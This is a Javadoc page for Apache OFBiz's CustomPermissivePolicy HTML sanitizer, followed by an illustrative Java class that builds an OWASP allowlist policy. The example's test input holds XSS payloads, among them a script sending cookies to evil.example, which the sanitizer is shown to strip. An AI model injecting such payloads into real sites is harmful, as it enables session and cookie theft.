Class CustomPermissivePolicy

java.lang.Object
org.apache.ofbiz.base.html.CustomPermissivePolicy
All Implemented Interfaces:
SanitizerCustomPolicy

public class CustomPermissivePolicy extends Object implements SanitizerCustomPolicy
Based on the AntiSamy eBay example. eBay (http://www.ebay.com/) is the most popular online auction site in the universe, as far as I can tell. It is a public site, so anyone is allowed to post listings with rich HTML content. Given how attractive eBay is as a target, it is not surprising that it has been subject to a few complex XSS attacks. Listings are allowed to contain much richer content than, say, Slashdot, so its attack surface is considerably larger. The following tags appear to be accepted by eBay (they don't publish rules): <a>,...
  • Field Summary

    Fields
    Modifier and Type | Field | Description
    static final org.owasp.html.PolicyFactory | POLICY_DEFINITION | A policy that can be used to produce policies that sanitize to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver).
  • Constructor Summary

    Constructors
    Constructor | Description
    CustomPermissivePolicy() |
  • Method Summary

    Modifier and Type | Method | Description
    org.owasp.html.PolicyFactory | getSanitizerPolicy() | Returns the sanitizer policy defined by the class that implements SanitizerCustomPolicy.

    Methods inherited from class java.lang.Object

    clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
  • Field Details

    • POLICY_DEFINITION

      public static final org.owasp.html.PolicyFactory POLICY_DEFINITION
      A PolicyFactory that produces sanitization policies writing to HTML sinks via PolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver); it can also be applied directly to a string with PolicyFactory.sanitize(String).
  • Constructor Details

    • CustomPermissivePolicy

      public CustomPermissivePolicy()
  • Method Details

    • getSanitizerPolicy

      public org.owasp.html.PolicyFactory getSanitizerPolicy()
      Description copied from interface: SanitizerCustomPolicy
      Returns the sanitizer policy defined by the class that implements this interface.
      Specified by:
      getSanitizerPolicy in interface SanitizerCustomPolicy
      Returns:
      the PolicyFactory defined by this class, i.e. POLICY_DEFINITION
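The following is an added illustration of the pattern this page documents (a static PolicyFactory built with the OWASP Java HTML Sanitizer, handed out through getSanitizerPolicy()). It is not the OFBiz source of CustomPermissivePolicy, and it does not reproduce the eBay-derived POLICY_DEFINITION described above. Only the package org.apache.ofbiz.base.html, the interface SanitizerCustomPolicy and the org.owasp.html.PolicyFactory type come from this page; the class name ExampleListingPolicy, the element and attribute allowlist, the HTML_CLASS pattern and the sample listing markup are assumptions made for the example.

```java
// Added example, not the OFBiz CustomPermissivePolicy source.
// Assumes the OWASP Java HTML Sanitizer (org.owasp.html) is on the classpath,
// which the PolicyFactory type on this page already requires.
import java.util.regex.Pattern;

import org.apache.ofbiz.base.html.SanitizerCustomPolicy;
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

public class ExampleListingPolicy implements SanitizerCustomPolicy {

    // Assumed pattern: constrain class attribute values rather than accepting
    // arbitrary strings. Values that do not match are dropped by the sanitizer.
    private static final Pattern HTML_CLASS = Pattern.compile("[a-zA-Z0-9\\s,\\-_]+");

    // Allowlist approach: every element and attribute not named here is removed,
    // which covers <script>, <iframe>, <object> and all on* event handlers.
    // The element list is an assumption for this example, far narrower than the
    // eBay-derived policy the page describes.
    public static final PolicyFactory POLICY_DEFINITION = new HtmlPolicyBuilder()
        .allowElements("a", "p", "b", "i", "u", "strong", "em",
                       "ul", "ol", "li", "br", "img", "span", "div")
        .allowAttributes("class").matching(HTML_CLASS).globally()
        // href only on <a>; the protocol allowlist below rejects javascript: and data:
        .allowAttributes("href").onElements("a")
        .allowUrlProtocols("http", "https", "mailto")
        // rel="nofollow" is added to every surviving link
        .requireRelNofollowOnLinks()
        // src/alt only on <img>; src goes through the same protocol allowlist
        .allowAttributes("src", "alt").onElements("img")
        .toFactory();

    @Override
    public PolicyFactory getSanitizerPolicy() {
        return POLICY_DEFINITION;
    }

    // Constructed sample input: the kind of rich listing markup the class
    // description talks about, with XSS payloads mixed in.
    public static void main(String[] args) {
        String untrusted =
              "<p class=\"desc\">Vintage <b>camera</b>, works great.</p>"
            + "<script>document.location='http://evil.example/?c='+document.cookie</script>"
            + "<img src=\"x\" onerror=\"alert(1)\">"
            + "<a href=\"javascript:alert(document.domain)\">see photos</a>"
            + "<a href=\"https://example.com/photos\">see photos</a>";

        PolicyFactory policy = new ExampleListingPolicy().getSanitizerPolicy();
        String safe = policy.sanitize(untrusted);
        System.out.println(safe);
    }
}
```

Running this prints the listing with the script element, the onerror handler and the javascript: URL removed, while the paragraph, bold text, class attribute and the https link (now carrying rel="nofollow") survive. The practical check before enabling any custom policy in OFBiz is exactly this: feed it a corpus of known XSS payloads alongside legitimate markup and inspect what passes, because a permissive policy deliberately trades attack surface for rich content and every added element or attribute widens that surface.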